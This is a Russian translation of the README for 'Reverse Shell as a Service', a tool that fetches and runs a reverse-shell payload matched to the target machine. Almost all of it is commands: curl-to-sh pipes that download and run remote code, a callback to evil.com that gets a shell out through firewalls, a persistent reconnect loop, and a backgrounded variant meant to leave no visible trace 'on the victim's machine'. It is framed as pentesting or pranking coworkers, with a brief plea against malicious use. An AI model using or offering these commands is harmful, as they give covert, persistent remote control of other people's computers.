
Сервис обратной оболочки по требованию, который автоматически определяет целевую среду и выполняет соответствующую полезную нагрузку для удаленного доступа во время тестов на проникновение.
Reverse Shell как сервис — https://reverse-shell.sh
Легко запоминающаяся обратная оболочка, которая должна работать на большинстве Unix-подобных систем.
Определяет доступное программное обеспечение на целевой системе и запускает соответствующий полезный код.
На вашей машине откройте порт и слушайте его. Это можно легко сделать с помощью netcat.
nc -l 1337
На целевой машине перенаправьте вывод https://reverse-shell.sh/yourip:port в sh.
curl https://reverse-shell.sh/192.168.0.69:1337 | sh
Вернитесь на свою машину, теперь у вас должна появиться приглашение оболочки.
Это предназначено для пентестинга или помощи коллегам в понимании того, почему они всегда должны блокировать свои компьютеры. Пожалуйста, не используйте это для чего-либо злонамеренного.
Вы можете использовать имя хоста вместо IP-адреса.
curl https://reverse-shell.sh/localhost:1337 | sh
Поскольку это обратное подключение, оно может пробивать брандмауэры и подключаться к интернету.
Вы можете слушать подключения на сервере evil.com и получить обратную оболочку изнутри защищенной сети с помощью:
curl https://reverse-shell.sh/evil.com:1337 | sh
По умолчанию при выходе из оболочки вы теряете соединение. Это может произойти случайно из-за неверной команды. Вы можете легко создать оболочку, которая будет пытаться переподключиться, обернув её в цикл while.
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
Будьте осторожны, если делаете это с коллегой: если они покинут офис с этим все еще работающим, вы подвергаете их атаке.
Терминальный сеанс должен оставаться открытым для сохранения соединения обратной оболочки. Это может быть небольшим подсказкой, если вы пытаетесь разыграть коллег.
Следующая команда запустит обратную оболочку в фоновом процессе и выйдет из терминала, не оставляя подозрительных окон терминала открытыми на машине жертвы.
Убедитесь, что вы запускаете это в новом окне терминала, иначе вы потеряете все данные в вашем текущем сеансе.
sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit
MIT © Luke Childs